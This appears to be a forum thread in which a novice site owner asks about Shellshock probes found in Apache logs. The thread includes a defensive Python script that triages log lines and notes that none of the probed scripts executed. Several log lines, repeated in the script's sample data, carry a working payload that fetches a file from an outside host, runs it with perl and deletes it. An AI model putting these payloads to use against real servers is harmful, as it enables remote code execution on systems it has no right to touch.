This is a bit confusing; by the way, I’m not a system administrator and only know a little bit about handling Linux.
I’m running a LAMP-based website and hosting it on Digital Ocean. The server is CentOS 7 and I installed a few security tools like Fail2ban. I frequently check the error logs and request logs, and just today I saw a few disturbing requests; examples below.
My question is: is the hacker trying to plant a virus file named "a2.png" in my /tmp folder? And did the hacker succeed in planting it?
How would I know if the virus is now running on my server?
So far I can’t see that the file exists in my /tmp folder. What security measures or server hardening should I install? And what is the proper configuration of Apache? I only used the standard Apache config when I installed LAMP.
The website I’m handling is on a virtual host and I’m using a framework to make it more secure. I’m just not sure if I’m on the right track securing my web server; I only installed Fail2ban for login attempts.
Error Log Examples
[Tue Aug 25 09:48:39.688528 2015] [core:error] [pid 24312] [client 64.15.155.177:33663] AH00126: Invalid URI in request GET HTTP/1.1 HTTP/1.1
[Tue Aug 25 09:48:40.877570 2015] [cgi:error] [pid 24306] [client 64.15.155.177:35398] script not found or unable to stat: /var/www/cgi-bin/report.cgi
[Tue Aug 25 09:48:41.042423 2015] [cgi:error] [pid 24331] [client 64.15.155.177:35687] script not found or unable to stat: /var/www/cgi-bin/webmap.cgi
Request Log Examples
64.15.155.177 - - [25/Aug/2015:09:48:39 -0400] "GET HTTP/1.1 HTTP/1.1" 400 226 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://coralindia.com/icons/a2.png -O /tmp/a2.png;curl -O /tmp/a2.png http://coralindia.com/icons/a2.png;perl /tmp/a2.png;rm -rf /tmp/a2.png*\");'"
64.15.155.177 - - [25/Aug/2015:09:48:39 -0400] "GET / HTTP/1.1" 301 234 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://coralindia.com/icons/a2.png -O /tmp/a2.png;curl -O /tmp/a2.png http://coralindia.com/icons/a2.png;perl /tmp/a2.png;rm -rf /tmp/a2.png*\");'"
64.15.155.177 - - [25/Aug/2015:09:48:40 -0400] "GET /main.cgi HTTP/1.1" 301 242 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://coralindia.com/icons/a2.png -O /tmp/a2.png;curl -O /tmp/a2.png http://coralindia.com/icons/a2.png;perl /tmp/a2.png;rm -rf /tmp/a2.png*\");'"
64.15.155.177 - - [25/Aug/2015:09:48:40 -0400] "GET /info.cgi HTTP/1.1" 301 242 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://coralindia.com/icons/a2.png -O /tmp/a2.png;curl -O /tmp/a2.png http://coralindia.com/icons/a2.png;perl /tmp/a2.png;rm -rf /tmp/a2.png*\");'"
64.15.155.177 - - [25/Aug/2015:09:48:40 -0400] "GET /index.cgi HTTP/1.1" 301 243 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://coralindia.com/icons/a2.png -O /tmp/a2.png;curl -O /tmp/a2.png http://coralindia.com/icons/a2.png;perl /tmp/a2.png;rm -rf /tmp/a2.png*\");'"
64.15.155.177 - - [25/Aug/2015:09:48:40 -0400] "GET /admin.cgi HTTP/1.1" 301 243 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://coralindia.com/icons/a2.png -O /tmp/a2.png;curl -O /tmp/a2.png http://coralindia.com/icons/a2.png;perl /tmp/a2.png;rm -rf /tmp/a2.png*\");'"
121.54.44.93 - - [25/Aug/2015:09:48:39 -0400] "GET / HTTP/1.1" 200 3785 "-" "Mozilla/5.0 (Linux; Android 4.4.2; en-ph; SAMSUNG SM-G7102 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Mobile Safari/537.36"
64.15.155.177 - - [25/Aug/2015:09:48:42 -0400] "GET /cgi-bin/register.cgi HTTP/1.1" 404 218 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://coralindia.com/icons/a2.png -O /tmp/a2.png;curl -O /tmp/a2.png http://coralindia.com/icons/a2.png;perl /tmp/a2.png;rm -rf /tmp/a2.png*\");'"
64.15.155.177 - - [25/Aug/2015:09:48:42 -0400] "GET /cgi-bin/download.cgi HTTP/1.1" 404 218 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://coralindia.com/icons/a2.png -O /tmp/a2.png;curl -O /tmp/a2.png http://coralindia.com/icons/a2.png;perl /tmp/a2.png;rm -rf /tmp/a2.png*\");'"
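The requests above carry the Shellshock probe pattern (a bash function definition `() { :;}` placed in the User-Agent header) aimed at common CGI script names. As an added example, not part of the original post, the following Python script parses combined-format Apache access-log lines like those in the question, flags the probes, extracts the download URL and the /tmp path named in the payload so the administrator knows exactly what to look for on disk, and records per source IP whether any probed script actually answered with a 2xx status. That last point matters because the payload can only run if Apache hands the request to a CGI script that is executed by an unpatched bash; 301, 400 and 404 responses mean no script ran. The sample lines are constructed from the question's excerpts with the payload shortened, and the function and variable names are my own.

```python
"""Triage Apache access-log lines for Shellshock-style probes.

Added example (not from the original post).  Parses combined-format
access-log lines, flags User-Agent strings carrying the Shellshock
function-definition prefix, pulls download URLs and dropped-file paths
out of the payload, and summarises per source IP which scripts were
probed and with what status code.
"""
import os
import re
from collections import defaultdict

# Combined log format: ip ident user [time] "request" status size "referer" "agent"
# The agent group is greedy so the embedded \" escapes do not end it early.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>.*)"$'
)

# Shellshock trigger: an exported bash function definition "() {" at the
# start of a request header that a CGI handler exports as an env variable.
SHELLSHOCK_RE = re.compile(r'\(\)\s*\{')
URL_RE = re.compile(r'https?://[^\s"\'\\;]+')
TMP_PATH_RE = re.compile(r'/tmp/[\w.\-]+')

# Constructed sample lines modelled on the question's excerpts (payload shortened).
SAMPLE_LOG = r"""
64.15.155.177 - - [25/Aug/2015:09:48:39 -0400] "GET HTTP/1.1 HTTP/1.1" 400 226 "-" "() { :;};/usr/bin/perl -e 'system(\"wget http://coralindia.com/icons/a2.png -O /tmp/a2.png;perl /tmp/a2.png;rm -rf /tmp/a2.png*\");'"
64.15.155.177 - - [25/Aug/2015:09:48:40 -0400] "GET /admin.cgi HTTP/1.1" 301 243 "-" "() { :;};/usr/bin/perl -e 'system(\"wget http://coralindia.com/icons/a2.png -O /tmp/a2.png;perl /tmp/a2.png;rm -rf /tmp/a2.png*\");'"
121.54.44.93 - - [25/Aug/2015:09:48:39 -0400] "GET / HTTP/1.1" 200 3785 "-" "Mozilla/5.0 (Linux; Android 4.4.2) AppleWebKit/537.36"
64.15.155.177 - - [25/Aug/2015:09:48:42 -0400] "GET /cgi-bin/register.cgi HTTP/1.1" 404 218 "-" "() { :;};/usr/bin/perl -e 'system(\"wget http://coralindia.com/icons/a2.png -O /tmp/a2.png;perl /tmp/a2.png;rm -rf /tmp/a2.png*\");'"
""".strip().splitlines()


def parse_line(line):
    """Parse one combined-format line; return a dict or None if it does not match."""
    m = LOG_RE.match(line.rstrip('\n'))
    if not m:
        return None
    rec = m.groupdict()
    parts = rec['request'].split()
    rec['method'] = parts[0] if parts else ''
    # "GET HTTP/1.1 HTTP/1.1" has no path at all; Apache answers it with 400.
    rec['path'] = parts[1] if len(parts) == 3 and not parts[1].startswith('HTTP/') else ''
    rec['status'] = int(rec['status'])
    rec['shellshock'] = bool(SHELLSHOCK_RE.search(rec['agent']))
    return rec


def payload_indicators(agent):
    """Return the download URLs and /tmp paths named in a probe's payload."""
    return {
        'urls': sorted(set(URL_RE.findall(agent))),
        'dropped_files': sorted(set(TMP_PATH_RE.findall(agent))),
    }


def triage(lines):
    """Summarise probes per source IP: hit count, (path, status) pairs,
    whether any probed script actually executed (2xx), and payload indicators."""
    report = defaultdict(lambda: {'hits': 0, 'probes': [], 'executed': False,
                                  'urls': set(), 'dropped_files': set()})
    for line in lines:
        rec = parse_line(line)
        if not rec or not rec['shellshock']:
            continue
        entry = report[rec['ip']]
        entry['hits'] += 1
        entry['probes'].append((rec['path'], rec['status']))
        if 200 <= rec['status'] < 300:
            entry['executed'] = True
        ind = payload_indicators(rec['agent'])
        entry['urls'].update(ind['urls'])
        entry['dropped_files'].update(ind['dropped_files'])
    return dict(report)


def find_dropped_files(report, exists=os.path.exists):
    """Return payload file paths from the report that are present on disk.
    `exists` is injectable so the check can be exercised without touching /tmp."""
    paths = set()
    for entry in report.values():
        paths.update(entry['dropped_files'])
    return sorted(p for p in paths if exists(p))


if __name__ == '__main__':
    summary = triage(SAMPLE_LOG)
    for ip, entry in summary.items():
        print(ip, 'hits:', entry['hits'], 'any 2xx:', entry['executed'])
        for path, status in entry['probes']:
            print('   ', status, path or '(no path)')
        print('    download URLs:', sorted(entry['urls']))
        print('    dropped files:', sorted(entry['dropped_files']))
    print('present on disk:', find_dropped_files(summary))
```

Run it against a real log with `triage(open('/var/log/httpd/access_log'))` and look at the `executed` flag and the `probes` list: in the question's excerpts every probed script came back 301 or 404, so Apache never executed one. An empty result from `find_dropped_files` agrees with what the questioner observed in /tmp, but it is not proof on its own, since the payload deletes its own file after running; the stronger checks are confirming that the installed bash package carries the Shellshock fix and that no unexpected `perl` process is running.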
The real question is: If you have no experience, why not use a regular shared hosting plan? – Daniel B – 2015-08-27T05:47:44.320
I had the EXACT same thing happen to my server at the same time. From my brief googling it looks somewhat similar to a shellshock attack. Make sure your system is patched. If anyone has any further info, it would be appreciated. – None – 2015-08-27T05:33:00.180
The same IP was found attempting to hack into our systems but in a somewhat different way. We've blacklisted them and contacted their host. Over the last 5 days or so it looks like there have been some other reports on that IP. – None – 2015-08-30T03:19:48.177
Additionally, targeting one IP address implies that the problem of bots probing websites goes away if you simply block one address, when the reality is that the IP might be blocked until the botnet decides to probe using another node/IP address. The days of simply blocking an IP address and calling it a day ended like 15+ years ago. Hardening, heuristic-based blocking and a good data recovery plan are the way to go. – JakeGould – 2015-08-30T04:49:04.310
iWeb hosting service out of Quebec, Canada. Whole netblock of addresses assigned to a datacenter to block if they decide to change it. It's like blocking an attack generated out of an Amazon Web Services EC2 VPS. – Fiasco Labs – 2015-08-30T05:10:36.343